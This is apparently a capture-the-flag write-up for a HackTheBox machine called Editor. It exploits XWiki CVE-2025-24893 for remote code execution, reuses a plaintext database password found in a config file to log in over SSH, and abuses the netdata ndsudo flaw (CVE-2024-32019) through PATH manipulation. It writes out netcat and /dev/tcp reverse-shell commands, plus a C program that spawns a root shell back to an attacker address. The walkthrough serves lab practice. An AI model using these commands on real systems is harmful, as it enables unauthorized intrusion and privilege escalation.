HackTheBox Editor Writeup

Editor is an easy Linux machine running a vulnerable version of XWiki that allows unauthenticated remote code execution, providing an initial foothold. Enumeration of the system reveals a misconfigured SUID binary, which can be exploited to escalate privileges and gain root access.

🕵️ Enumeration#

After spawning the machine and connecting to the VPN, we start with the initial enumeration.

🔍 Initial Nmap Scan#

We begin by running an initial nmap scan with the following command:

nmap -sC -sV -vv -oA nmap/initial_scan 10.10.11.80

• -sC Default script scan
• -sV Service version detection
• -vv Verbose output
• -oA Output all formats

Nmap reports 3 Ports open:

22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8080/tcp open  http    syn-ack ttl 63 Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (40 shown)

🌐 Web Footprinting#

The http title shows http://editor.htb, so first we add this URL together with the IP in our hosts file.

Now we visit the website http://editor.htb in the browser and see the website for a code editor called SimplistCode Pro for Debian, Ubuntu, and Windows.

By looking around on the page we can find About which is not really interesting but Docs. Docs is navigating us to http://wiki.editor.htb/xwiki/ which is not available

In addition, I downloaded both binaries and analyzed them a little, but didn’t find anything interesting. I also didn’t think that we need to know binary reverse engineering on an easy box.

Therefore, we will continue to focus on the web app and the wiki.

When reviewing our Nmap scan again, I notice port 8080 once more. We simply try to access http://editor.htb:8080 and it works. This takes us to the SimplistCode Pro Wiki, which is powered by XWiki 15.10.8.

By googling XWiki 15.10.8, we come across the CVE-2025-24893.

To exploit the vulnerability we use gunzf0x PoC from github

As far as I can understand, the PoC uses a template injection in the XWiki function SolrSearch (RSS).

Groovy code is injected via the text= parameter, which executes arbitrary system commands on the server via “COMMAND”.execute().

The script generates the payload, URL-encodes it, appends it to the endpoint, and sends a GET request, triggering remote code execution. In This case a reverse shell.

👣 Gaining Foothold#

The PoC is designed so that we pass the target URL with -t and the command we want to execute with -c

I like to test remote code execution first with ping and tcpdump

First we start tcpdump on our attack host to monitor ICMP traffic with the following command:

tcpdump -i tun0 ICMP

Second we exceute the Script with the ping command back to our attack host:

python3 exploit.py -t 'http://editor.htb:8080' -c 'ping 10.10.14.13'

If we now see incoming ICMP packets in our TCPDump, we know that the RCE is working. In this case, it is, so we grab a reverse shell from revshells and start the listener with nc on our attack host on Port 9001

nc -lvnp 9001

After that we start the exploit, this time with the reverse shell, with the follwing:

python3 exploit.py -t 'http://editor.htb:8080' -c 'busybox nc 10.10.14.13 9001 -e sh'

If everything works, we now have a shell with the user xwiki on the box.

Now lets upgrade the shell with:

python3 -c 'import pty; pty.spawn("/bin/bash")'

👽 Lateral Movement#

Looking around on the box, we find a home directory named oliver. However, we do not have access to it as xwiki. At least now we know there is user called oliver on the box. We’ll make a note of that.

Now something strange happened that doesn’t affect the further escalation path, but I wanted to include it in the write-up anyway. I already solved this box while it was still active. Of course, I can only publish the write-up once the box has been retired. Nevertheless, I’m reproducing everything again before publication, just to check. In my first run, there was a directory ~/data/mails/ in the home directory of the user xwiki, which contained an email with a password reset link for a user. Unfortunately, the corresponding CSRF token was missing. However, since I found the functions for validation and encryption tokens in the xwiki config, I thought that was the way to escalate. That turned out to be quite a rabbit hole, but I realized there had to be another way. The strange thing was that now, since the box was retired, the entire mail directory is missing, and with it the email.

Since I didn’t really get anywhere, I ran linpeas from /dev/shm, but unfortunately that didn’t really yield any useful results either.

While going through the configs and xmls of the wiki application again, I came across a plain text password in the file /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml.

<property name="hibernate.connection.password">theEd1t0rTeam99</property>

✅ User Flag#

Since we know that the user oliver must exist on the box, we’ll simply try to log in via SSH with oliver:theEd1t0rTeam99

It works

From here we can cat the user.txt from olivers home directory:

cat /home/oliver/user.txt

🎉Privilege Escalation#

As user oliver, we run linpeas again and see the following interesting results:

══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-x--- 1 root netdata 943K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.4M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 196K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 80K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 876K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 4.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!)
-rwsr-xr-x 1 root root 40K Feb  6  2024 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 71K Feb  6  2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr  9  2024 /usr/bin/su
-rwsr-xr-x 1 root root 35K Apr  9  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Mar 23  2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 227K Jun 25 12:48 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 59K Feb  6  2024 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 47K Apr  9  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 72K Feb  6  2024 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-- 1 root messagebus 35K Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 331K Apr 11 12:05 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 19K Feb 26  2022 /usr/libexec/polkit-agent-helper-1

After a little Googling for netdata and suid, we find the CVE-2024-32019 and a PoC on github The script creates a SUID binary that assumes root ID when executed via setuid(0) and then opens a reverse shell as root via /dev/tcp/…; it uses the insecure netdata binary ndsudo, which can make any file executable as root.

We check if the user oliver is in the netdata group with:

groups

Indeed, he is, and so I can also use the ndsudo binary with oliver

We adapt the script to our needs as follows:

#include <unistd.h>  // for setuid, setgid, execl
#include <stddef.h>  // for NULL

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/10.10.14.13/9001 0>&1", NULL);
    return 0;
}

Now we compile it with:

x86_64-linux-gnu-gcc -o nvme pe.c -static

After that we transfer the compiled binary to the target host and make it excecutable

chmod +x nvme

Then we set up a nc listener on our attacker machine:

nc -lvnp 9001

Then we Exploit the vulnerable binary via PATH manipulation:

PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Now we have a reverse Shell as root

✅ Root Flag#

In the Reverse Shell we can cat the flag vom root’s home with:

cat /root/root.txt